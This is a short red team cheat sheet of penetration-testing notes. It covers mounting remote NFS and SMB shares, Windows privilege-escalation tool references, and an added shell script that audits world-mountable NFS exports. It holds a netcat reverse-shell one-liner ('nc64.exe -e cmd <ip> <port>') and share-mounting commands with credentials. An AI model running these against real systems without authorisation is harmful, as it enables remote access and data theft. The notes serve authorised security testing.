Red Team Notes

Sorted Linux notes; need to separate into different pages and reorganize

Hack Responsibly.

Always ensure you have explicit permission to access any computer system before using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here.

living off the land binaries: LOLBAS

Enumeration

Windows Privilege Escalation Enumeration Script: WinPEAS

Little bit o' everything: PowerSploit

Shares

Mounting NFS Shares Remotely

showmount -e <ip>
<list of mounts>
mkdir /tmp/<foldername>
mount -t nfs <ip>:/<mount-folder> /tmp/<foldername>
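Added example, not part of the original notes: a small POSIX sh helper that parses showmount -e output and reports only the exports whose client list is the wildcard, i.e. the ones any remote host can mount with the commands above (useful when auditing which exports are actually exposed). The function names and the sample showmount output are constructed for this example.

```shell
#!/bin/sh
# Added example, not from the original notes. Parses `showmount -e` output and
# lists exports whose allowed-client field is "*" (or "(everyone)"), i.e. the
# exports that any host can attach to with the mount command above.
# Function names and the sample output are constructed for this example.

# Read showmount -e output on stdin, print only the export paths that are
# open to every client. Assumes the nfs-utils output format:
#   Export list for <host>:
#   /path   <client-list>
parse_open_exports() {
    awk 'NR > 1 && ($2 == "*" || $2 == "(everyone)") { print $1 }'
}

# Query a live host and print its open exports, one path per line.
audit_host() {
    showmount -e "$1" | parse_open_exports
}

# Constructed sample output so the parser can be exercised offline
# (10.0.0.5 is a placeholder, not a real host).
SAMPLE_EXPORTS='Export list for 10.0.0.5:
/srv/backup *
/home       10.0.0.0/24
/tmp        (everyone)'

# Number of open exports in the sample (expected: 2).
count_sample_open_exports() {
    printf '%s\n' "$SAMPLE_EXPORTS" | parse_open_exports | wc -l | tr -d ' '
}

# First open export path in the sample (expected: /srv/backup).
first_sample_open_export() {
    printf '%s\n' "$SAMPLE_EXPORTS" | parse_open_exports | head -n 1
}
```

Run audit_host <ip> against a host you are authorized to test; exports it prints are the candidates for the mount step above.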

Using smbmount

smbmount //$IP/$share /mnt/remote/ -o username=$user,password=$pass,rw

Where /mnt/remote is the local folder to mount the share to.

Unsorted

Netcat reverse shell (after uploading the binary!): nc64.exe -e cmd <ip> <port>

SpecterOps tools: https://specterops.io/resources/research-and-development

easy Windows shell: unicorn.py (trustedsec/unicorn); see HackTheBox - Arctic

system information: sysinfo

Get user id: getuid

Powershell privilege escalation:

fuzzbunch: exploit tool similar to metasploit

check what updates are installed: type WindowsUpdate.log

net use share from Linux [like SimpleHTTPServer, but for SMB]: impacket-smbserver <sharename> '<dir_to_share>'
